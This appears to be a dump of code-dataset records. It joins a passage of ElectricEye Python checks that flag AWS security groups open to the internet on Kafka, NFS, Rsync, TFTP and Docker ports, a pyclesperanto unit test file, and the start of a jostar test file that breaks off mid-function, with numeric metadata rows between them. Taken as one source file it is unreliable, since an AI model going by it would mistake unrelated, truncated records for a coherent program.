"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Kafka streams (TCP 9092) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9092" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kafka-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Kafka streams (TCP 9092) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_nfs_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "2049" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-nfs-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted NFS (TCP 2049) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "2049" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-nfs-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted NFS (TCP 2049) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_rsync_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "873" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rsync-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Rsync (TCP 873) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "873" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rsync-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Rsync (TCP 873) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_tftp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "69" and cidrIpRange == "0.0.0.0/0" and ipProtocol == "udp":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-tftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted TFTP (UDP 69) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "69" and cidrIpRange != "0.0.0.0/0" and ipProtocol == "udp":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-tftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.23] Security groups should not allow unrestricted TFTP (UDP 69) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted TFTP (UDP 69) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_docker_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "2375" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-docker-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Docker (TCP 2375) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "2375" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-docker-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.24] Security groups should not allow unrestricted Docker (TCP 2375) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Docker (TCP 2375) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue | 55.483966 | 282 | 0.413533 | 16,749 | 226,652 | 5.581766 | 0.026151 | 0.033373 | 0.023104 | 0.028239 | 0.987934 | 0.987731 | 0.987731 | 0.983388 | 0.979474 | 0.974767 | 0 | 0.064484 | 0.491701 | 226,652 | 4,085 | 283 | 55.483966 | 0.747003 | 0.013655 | 0 | 0.86145 | 0 | 0.037877 | 0.356659 | 0.035726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00623 | false | 0.005981 | 0.000748 | 0 | 0.007476 | 0.017443 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
25dd5514913ac597638a5910a2757191aa413eaf | 1,146 | py | Python | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_sum_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_sum_of_all_pixels_3d():
test1 = cle.push(np.asarray([
[
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 2, 0, 0]
]
]))
s = cle.sum_of_all_pixels(test1)
assert s == 20
def test_sum_of_all_pixels_2d():
test1 = cle.push(np.asarray([
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 2, 0, 0]
]))
s = cle.sum_of_all_pixels(test1)
assert s == 20
def test_sum_of_all_pixels_1d():
test1 = cle.push(np.asarray(
[0, 4, 0, 0, 2]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
def test_sum_of_all_pixels_1d_y():
test1 = cle.push(np.asarray(
[[0], [4], [0], [0], [2]]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
def test_sum_of_all_pixels_1d_z():
test1 = cle.push(np.asarray(
[[[0]], [[4]], [[0]], [[0]], [[2]]]
))
s = cle.sum_of_all_pixels(test1)
assert s == 6
| 19.1 | 47 | 0.466841 | 186 | 1,146 | 2.645161 | 0.166667 | 0.109756 | 0.085366 | 0.284553 | 0.890244 | 0.890244 | 0.847561 | 0.843496 | 0.843496 | 0.843496 | 0 | 0.118046 | 0.356894 | 1,146 | 59 | 48 | 19.423729 | 0.549525 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 1 | 0.119048 | false | 0 | 0.047619 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d350bb9b62ad027f30840ef90fb50efb1e318f02 | 11,411 | py | Python | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 5 | 2021-07-09T17:59:25.000Z | 2021-09-18T21:29:40.000Z | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 1 | 2021-09-19T18:38:55.000Z | 2021-09-28T18:15:48.000Z | test_jostar.py | amirhszd/jostar | 26a6769ca40081383537f5b38bdb1777c104f00b | [
"MIT"
] | 2 | 2021-07-12T14:03:16.000Z | 2021-07-23T11:11:38.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 31 14:57:23 2021
@author: Amirh
"""
from sklearn.datasets import make_classification, make_regression
from sklearn.metrics import r2_score
from jostar.algorithms import ACO, GA, SA, PSO, PlusLMinusR, DE, NSGA2, SBS, SFS
from sklearn.svm import SVR, SVC
from sklearn.base import is_classifier, is_regressor
from sklearn.model_selection import KFold
import warnings
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
import matplotlib
def eval_opt_model_output_regression(opt_model, n_f):
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
seq_models = ["PlusLMinusR", "SFS", "SBS"]
if opt_model._name_ in rank_models:
assert len(opt_model.best_fits) == 1
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert len(opt_model.rankings) == 2
assert opt_model.display_results() is not None
elif opt_model._name_ in seq_models:
if opt_model._name_ != "SBS":
assert len(opt_model.best_fits) == n_f
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert opt_model.display_results() is not None
else:
assert len(opt_model.best_sol) == n_f
assert is_regressor(opt_model.model_best)
assert opt_model.display_results() is not None
else:
result_df = opt_model.res_df
assert isinstance(result_df, pd.core.frame.DataFrame)
assert opt_model.display_results(0) is not None
plt.close('all')
pbar.update(1)
def eval_opt_model_output_classification(opt_model, n_f):
rank_models = ["GA", "SA", "PSO", "ACO", "DE"]
